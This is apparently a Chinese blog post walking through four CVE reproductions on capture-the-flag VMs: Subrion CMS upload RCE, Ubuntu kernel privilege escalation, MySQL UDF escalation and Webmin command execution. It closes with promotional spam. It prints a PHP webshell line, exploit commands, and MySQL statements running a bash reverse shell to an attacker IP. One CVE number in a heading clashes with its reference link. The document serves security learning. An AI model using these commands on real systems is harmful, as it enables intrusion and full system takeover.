分享几个CVE漏洞复现,从零基础到精通,收藏这篇就够了!

别光盯着最新的0day了,咱也得温故而知新,捡几个CVE漏洞出来溜溜!

神兵利器:DecryptTools 数据库密码破解一把梭!

代码审计?用铲子 SATST 挖地三尺,不放过任何 Bug!

一、CVE-2018-29422:Subrion CMS 文件上传,一不小心就 RCE 了!

目标:venom

先给 venom.box 安排个域名解析,方便咱们下手。

点它!

哟,登录界面,还贴心地告诉你系统版本:Subrion CMS v4.2.1,简直是送温暖!

image-20250312153555716

image-20250312153555716

赶紧 Google 一下,发现历史漏洞一枚:文件上传 RCE,安排!

image-20250312153755215

image-20250312153755215

下载下来仔细研究:

参考文章:https://github.com/hev0x/CVE-2018-19422-SubrionCMS-RCE

一顿操作猛如虎:

sudo python3 49876.py -u http://venom.box/panel/ -l dora -p E7r9t8@Q#h%Hy+M1234

Shell 是拿到了,但是非交互模式,差评!

换个姿势,直接登录管理面板,密码是维吉尼亚解密密码,够骚!

成功上位,管理员权限到手!进设置瞅瞅:

既然有文件上传 RCE 漏洞,那就后台找找文件上传点,安排!

Bingo!发现一处,可以上传!

image-20250312155354469

image-20250312155354469

点它!

image-20250312155446078

image-20250312155446078

先拿 txt 文件试试水,上传成功!

image-20250312155542068

image-20250312155542068

上 php 文件,结果...被过滤了,看来没那么容易。

track <?php system($_GET["a"]); ?>

看路径!

image-20250312155917497

image-20250312155917497

漏洞利用代码里给了提示,要用 pht 或 phar 后缀!

exp文章:https://github.com/intelliants/subrion/issues/801

image-20250312165130284

image-20250312165130284

安排!在这个网站生成反弹 shell:https://www.ddosi.org/shell/

新建 .pht 文件上传,访问路径,攻击机监听端口,反弹成功!

image-20250312165548422

image-20250312170506847

image-20250312170506847

二、CVE-2021-3493:Ubuntu 低版本内核提权,菜鸡也能变大佬!

目标:venom

继续考古,搜索历史漏洞!

image-20250312170937361

image-20250312170937361

下载下来研究:

image-20250312171341391

image-20250312171341391

使用方法安排上:

image-20250312171249834

image-20250312171249834

开启 web 服务,靶机下载脚本!

image-20250312171518442

image-20250312171518442

结果...执行失败,赋权也不行,看来姿势不对!

image-20250312172158480

image-20250312172158480

换个 exp,在这个网站找到:

exp文章:https://github.com/briskets/CVE-2021-3493

下载到 kali!

image-20250312172439048

image-20250312172439048

Kali 开启 web 服务,靶机用 wget 下载,赋权、编译、执行,一气呵成!

提权成功!进 **/root 目录,找到 flag

image-20250312172519193

image-20250312172519193

三、CVE-2016-6662:MySQL UDF 提权,数据库也能玩出花!

先瞅瞅系统是 64 位还是 32 位,这决定你用哪个 UDF 文件!

目标:sundown

64 位!再看看 secure_file_priv 是不是空的,这决定 MySQL 对导入导出有没有限制!

show global variables like 'secure%';

没回显!

看看具体信息:

  • NULL:不允许导入导出,GG
  • /tmp/:只能在 /tmp/ 搞,GG
  • 空:随便搞,冲!

MySQL 版本 >=5.1,UDF 要传到 mysqllibplugin 目录,用 show variables like "%plugin%" 看看!(没有就自己建一个)

查路径!

show variables like '%plugin%'; 路径:/usr/lib/x86_64-linux-gnu/mariadb19/plugin/

信息都到位了,开始提权!Kali 到 /usr/share/metasploit-framework/data/exploits/mysql 目录,复制 64 位的 UDF 文件到本地!

Kali 开启 web 服务,传文件!

上传成功!

回到靶机,进 /tmp 目录!

回到数据库,执行命令,看看 MySQL 数据库下的表信息!

执行下面的命令:

create table shell(line blob);  # 需要为blob,因为是二进制对象存储容器,存储下面load_file的返回值
insert into shell values(load_file('/tmp/lib_mysqludf_sys_64.so'));  # 插入并存储load_file的返回值

写入文件,创建函数,反弹 Shell!

select * from shell into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys_64.so';  # 将/tmp/udf文件写入到plugin里
create function sys_exec returns integer soname 'lib_mysqludf_sys_64.so';  # 创建函数于udf文件中加载
select sys_exec('bash -c "bash -i >& /dev/tcp/192.168.108.130/4444 0>&1"');  # 调用函数执行反弹shell

开启监听端口,执行,成功反弹 Shell!

四、CVE-2019-15107:Webmin 远程命令执行,不登录也能 Get Shell!

目标:Source

访问 10000 端口,是个登录网站,源码和指纹没啥利用价值!

想到刚才找到的版本号,查查历史漏洞!

下载下来看看,要结合 MSF 才能用!

上网搜搜,参考文章:

https://github.com/squid22/Webmin_CVE-2019-15107 https://github.com/jas502n/CVE-2019-15107?tab=readme-ov-file

下载 exp 到 Kali!

赋权!

开启监听端口,执行脚本!

./webmin_exploit.py 192.168.108.154 10000 192.168.108.130 4444

Root 权限到手!

黑客/网络安全学习包

资料目录

  1. 成长路线图&学习规划

  2. 配套视频教程

  3. SRC&黑客文籍

  4. 护网行动资料

  5. 黑客必读书单

  6. 面试题合集

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

*************************************CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享*************************************

1.成长路线图&学习规划

要学习一门新的技术,作为新手一定要先学习成长路线图方向不对,努力白费

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。


因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

*************************************CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享*************************************

2.视频教程

很多朋友都不喜欢晦涩的文字,我也为大家准备了视频教程,其中一共有21个章节,每个章节都是当前板块的精华浓缩


因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

*************************************CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享*************************************

3.SRC&黑客文籍

大家最喜欢也是最关心的SRC技术文籍&黑客技术也有收录

SRC技术文籍:

黑客资料由于是敏感资源,这里不能直接展示哦!

4.护网行动资料

其中关于HW护网行动,也准备了对应的资料,这些内容可相当于比赛的金手指!

5.黑客必读书单

**

**

6.面试题合集

当你自学到这里,你就要开始思考找工作的事情了,而工作绕不开的就是真题和面试题。

更多内容为防止和谐,可以扫描获取~

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

*************************************CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享*********************************

猜你喜欢

转载自blog.csdn.net/Javachichi/article/details/146983468
今日推荐